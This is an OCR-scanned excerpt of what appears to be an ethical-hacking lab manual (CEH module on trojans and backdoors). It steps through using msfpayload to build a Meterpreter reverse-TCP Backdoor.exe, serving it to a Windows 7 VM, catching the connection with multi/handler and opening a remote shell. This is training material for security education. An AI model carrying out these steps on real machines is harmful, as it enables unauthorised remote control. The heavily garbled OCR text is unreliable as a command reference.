- 10.0.0.6'aha'cl£1 MottVniUd G«ttin9 $U11*d i..i Su99«a«d SiUt W«b 9 <■041 ay

Index of/share

Nam e Last m udilit-d Sue D escription

Parent Directory23-0 c t-2 0 12 12:12 72K

Apache/2.2.14 (Ubtmru) Server a t 1 0 0.0 .6 Port SO

BaikTratj VI■ J Window o fl,

FIGURE 11.10: Firefox web browser with Backdoor.exe

13. D ow n load and save die B ackdoor.exe tile 111 W indow s 7 V irtua l Machine, and save d iis file on die desktop.

H Z י Action Media Clipboard View׳ Help

10 ® @ 0 ri is• fe •5

C EHCertified Ithical Hacker

•Unnujl*

w

FIGURE 11.11: Saved Backdoor.exe on desktop

14. Switch back to the B ackT rack m achine.

15. O pen the M e tasp lo it console. T o create a handler to handle the connection from v ic tim macliine (W indows 7), type the com mand use e xp lo it/m u lti/h a n d le r and press Enter


I f you d idn 't have apache2 insta lled, run apt- get ins ta ll apache2




A I 1UC OCt 23. 12:30 PM ,

Fil• Action Midi• CI!pbo»rd V!** Htfp

I t > ® @ 0 I I I t >»Applications Placcs system

v x !terminal י׳

Bnckdoor.e f '1* Edlt V1ew Terminal Help

! ) ־. • ״ * /

nsf > nsfpayload w1 ndows/׳»e te rp re te r/ reverse tcp LHOSW97T1m7b.91 X^Ogfefetop/Backdoor.exe [ * ] exec: nsfpayload w ind o w s/re terp rete r/ re ve rse tcp LHOST-192. I$a-e0?9 ix > C ^ g w ^ ^ jd o o r

Created by nsfpayload (h t tp :/ A A M .n e ta s p lo it .c o n ).Payload: windows/mete rp re te r/ reve rse tcpLength: 290 %

Options: ("LHOST192.168.8.91 ■<:=*־"> nsf > use exp lo it/n u lti/ha rK fle r |nsf e x p lo it (hand le r) >

< < back I track

£0 The exploit will be saved on/ root/.msf4/data/exploits/ folder

FIGURE 11.12: Exploit the victim machine

16. T o use the reverse TCP, type the command se t payload w indow s/m e te rp re te r/reve rse_ tcp and press Enter

« ז ״׳ ן • ׳

il


£j [>y, 1ue OCt 23. 12:36 PM ,

File Action Media Clipboard View Help<010 ® e e 11 it ן h *>

Applications Places system

!esktop/Backdoor.exe ^*jpes k top / Ba c kd 00 r

Backdoor.J Fl|e Edit View Terminal Help

Imsf > tisfpayload w indows/neterpreter/reverse tcp LHOST192.168.8.91־ [*1 exec: nsfpayload w lndow s/reterpreter/reverse tcp LH0ST=192.J68.8

Created by nsfpayload ( h ttp :/ /M M .n e ta sp lo it .co n ) .Payload: windows/m eterpreter/reverse tcp fLength: 290 ;f/

Opt io n s : { < ״LHOST"->" 192.168 8.91־־BSl > use exo lo lt/Bultl/handler ^nsf exploit(handler) >jset payload windowi/meterpreter/reveise tcp I pay I on d -> windows/mete rpmvr7TPVPrCT־ rrp 1flfcf exploit (h and le r) >

<< back I track 5

U=U To set reverse TCP vise the following command set payloadwindows/meterpreter/reverse - tcP

FIGURE 11.13: Setup die reverse TCP

17. T o set the local IP address that w ill catch the reverse connection, type the com m and se t Ihost 10.0.0.6 (B ackT rack IP Address) and press E n te r



http://MM.netasploit.con


BackTrack 0ח WIN-D39MR5HL9C4 - Virtual Machine Connection

d I HJC oct 23. 12:40 PM

Fil• Action Midi* Clipboard Vi** H*lp•it 9 (•) © 0 M l*•

Applications Placcs system (*J

1/5 rI A v * TfcrroinalBnckdoor.J File Edit View Terminal Help

! n i l > is fp ay load wind01rfs/»eterpreter/reverse_tcp 1H0ST-192.168.8.91 X > Oesktop/Backdoor.exe |[+ j exec: msfpayload w indows/neterpreter/reverse tcp LHQST-192.168.8.91 X > Desktop/Backdoor.!

Created by rasfpayload ( hTtp ://wwx.netasp lo it.co«1)._ — - " "Payload: w indovs/m eterpreter/reverse_tcp Length: 298

options: {"LH05T“=>"192. 168.8.91*} msf > use explo.it/11u lti/ha nd le rmsf e x p lo it (handler) > set payload wmdows/neterpreter/reverse tcp payload => windows/neterpreTer/reyerse tco msf e x p lo it (hand le r) > |set Ih o s t 1 8 .6 .S .6 |IhosT => 10.6 . 0 .6

e x p lo i t ( h a n d le r) >_________________________________________________________

< < back I track

58a.FIGURE 11.14: set the lost local IP address

18. T o start the handler, type the com m and e x p lo it -j -z and press Enter

I I 1BackTrack on W1N-D39MR5HL9£4 - Virtual Machine Connection

TUe OCt 23.12:44 PM


a 11 !»• ^ j> @ ® נ »Applications Places system [> j

^ ■ /4t | י־ “ > ־״™״יי ■

Backdoor.d File Edit View Terminai Help

Created by nsfpayload ( h ttp :/ / w w .n e ta s p lo it.c o n ) . Payload: windows/meterp re te r/ reve rse tcp Length: 298

Options: { {״IHOST■‘=>•'192.168.8.91,־ msf > use e x p lo it/n u lti/ha nd le rmsf e x p lo it (hand le r) > set payload windows/neterpretpayload => w indows/rieterpreter/reverse tcpmsf e x p lo it (h a n d le r) > set Ih o s t 18.8 .8 .6Ih o s t -> 1 0 .0 .0 .6 j msf e x p lo it (handler) > !e x p lo it -j - 1 1I* ] Exploit running as background job

[ - I S ta rted reverse handler on 18.0.6.6:4444 I I S״־ ta r t in g the payload h a n d le r... msf e x p lo it (hand le r) > I

<< back I track 5

FIGURE 11.15: Exploit the windows 7 machine

19. N o w sw itch to the v ic t im m ach ine (W indows 7) and double-click the Backdoor.exe file to run i t (which is already downloaded)

20. Again sw itch to the BackTrack machine and you can see the fo llow ing figure.



hTtp://wwx.netasploit.co%c2%ab1)._

http://ww.netasploit.con


BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection-!,“י * יFilt Action M#di* CI1pbo»rd Vi•* Htfp

•it S (•) @ O I I 1► *»Applications Places system d M: TUcoct23. 3:02 pm ,

a v x ־!terminal/ File Edit View Terminal Help

Back( ♦ " “־* I 927 exploits • 499 auxiliary • 151 post ־• --■[ 251 ■» payloads 28 encoders 8 nops

1st > msfpayload windows/iieterpreter/reverse tcp LHOST-10.0.0 6 X > Desktop Backdoor.exe [* ] exec: nsfpayload windoirfs/meterpreter/reversetcp LHOST=10.0.0.6 X > Desktop Backdoor.exe

sh: Desktop: is a directorymsf > msfpayload windows/neterpreter/reversetcp LHOST=10.0.0.6 X > Desktop/Backdoor.exe l ״ J exec: nsfpayload windoirfs/meTerpreter/reverse tcp LHO I־ lft.ft.-O^TX 0־*יe1 tt’6J»/Backdoor.exe״

Created by msfpayload <http://*w.netasplo1t.co11) .Payload: windows/neterpreter/reversetcp Length: 290

Options: {-LH0ST .10־ 0. 0. *>=״6 }a k l > use exp lo it/m u lti/hand ler ^r s f e x p lo it (hanc ler) > set payload w indows/neterpreter/reverse tcp payload => w indow s/m eterpreter/reversetcp aisf e x p lo it (hand ler) > set Ih o s t 10.0.8.6I host => 10.0.0.6 _

______________Lf cl L is.l i l e x p lo it (handler) > e x p lo it -J -£|[* ] E x p lo it^ ^ n n ir^ i^ fc a ^ ii^ o u r^ ijo W / T ■

[* ]^ ^ rt^ ta fe ve r ל« randier of! 18.0.9.6:444}l3 Starting the pjtfytoad hsrdier^rr ־*J i i f e x p lo it (handler) > [ ״ ] Sending S t JB c (751121 10.0.0.5 n s l ex p lo it (h a n d le r ) > [• ! Sending s t ^ e (751128 bytes) to■

־[!J Interpreter session 1 opened (10.C 6.6:4444 -> 10.0.0.5:49458) at,1 2012-19-23 :־?!57152 ♦0530 |

FIGURE 11.16: Exploit result of windows 7 machine

21. T o interact w ith the available session, type the command sessions -i 1and press E n te r

l& T o in te ract w ith the available session, you can use sessions -i <session id>

FIGURE 11.17: creating the session

22. E n te r the com mand she ll, and press Enter.



http://*w.netasplo1t.co11


r . BackTrack on W1N-D39MRSHL9E4 - Virtual Machine Connection 1 □ ך *

| File Action Media Clipboard V!*w Help

\ <n 0 (•) ® o 1 1 1► »Applications !,laccs system d 1 RJC OCt 23, 3:13 PM

a n/ x *!terminal / File Edit view ifefmmal Help

Backc Created by msfpayload ( http://www.netasplo1 t.co ■ >.Payload: w indows/neterpreter/reverse tep Length: 290

Options: CLHOST*10. 0. 0. 6“ "־■> } n k l > use exp lo it/m u lti/hand lermsf e x p lo it (handler) > set payload w indow s/ne te rp rete r/reve rse tcp payload *> w indow s/m eterpreter/reversetcp «1s f e x p lo it (handler) > set !h ost 16.6.8.6I host 10.0.0.6 <־ B i l e x p lo it (handler) > e x p lo it -j -2 [ * J Ex p lo it running as background job.

[*1 S ta rted reverse handler on 16.6.6.6:4444 [ * j S ta r t in g the payload h a n d le r . ..I l i l e x p lo it (handler) > [* ] Sending stage (752128 bytes) to 16.0.6.5[* ] H ete rp rete r session 1 opened (16.6.0 .6 :4444 -> 16.6.0.5:49458) a t 2612-10-

nsf e x p lo it (handler) > sessions * i 1 [ * ] S ta r t in g in te ra c t io n w ith 1 .. .

c!«JS<1V1״I J Q L | \ L I Q L IVM icroso ft Windows T v e / s io if i f n . 76&TjCopyright (c ) 2609 M icrosoft Corporation. A l r ig h ts reserved ,

c :\users\AiHnln\pesktop>|

FIGURE 11.18: Type the shell command

23. Type the d ir com m and and press Enter I t shows all the directories present on the v ic tim machine (W indows 7).

1 - 1 ° ' r ’BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection

a


<010 ® @ e 111► 1 fe 5Applications Places system cj

/ a xy x Term inal../ File Edit view lerminal Help

Backc»1s f e x p lo it (handler) > sessions - i 1 [- ] In v a lid session id nsf e x p lo it (handler) > sessions ■i 2 [ * ] s ta r t in g in te ra c t io n w ith 2 . . .

ne te rp re te r > sh e ll Process 2546 created .Channel 1 created . -M icroso ft windows [ve rs ion 6.1.76011Copyright (c ) 2609 M icrosoft Corporation. A l l rig h ts reserved.

C:\Users\Adwin\Desktop?f a i f I d irvolume in drive c has no label.Volume S e r ia l Nunber i s 6868-71F6

Oirectory of C:\Users\Adnin\Desktop I10/23/2012 02:56 <0IR> | .

ftp s Ljsis2 O ir (s ) 56.679,985.152 by te s lfre e

C :\Users\Adrn1 n\Desktop>§_________________________________________________

FIGURE 11.19: check die directories of windows 7

L a b A n a ly s is

Analyze and document die results related to die lab exercise. Give your opinion on your target’s security posture and exposure dirough public and free information.



http://www.netasplo1t.co%e2%96%a0

PLEASE T A L K TO YOUR I N S T R U C T O R IF YOU H A V E Q U E S T IO N SR E L A T E D TO T H IS LAB.

T o o l /U t i l i t y In fo rm a tio n C o lle c te d /O b je c tiv e s A ch ieved

M e ta s p lo it O u tp u t:

Hack the W indow s 7 machine directories

In te rn e t C o n n e c tio n R e q u ire d

□ Yes

P la tfo rm S upported

0 C lassroom

0 N o

0 iLabs

CEH Lab Manual Page 528 Ethical Hacking and Countermeasures Copyright © by EC-CouncilA l Rights Reserved. Reproduction is Stricdy Prohibited.

ceh v8 labs module 06 trojans and backdoors

Documents

e r v e raf e e

e rs e r v e r t r o

d o o r slabc r e

e rm e

n sc r e

r o u n d

p u t e r r u n n

gp r o r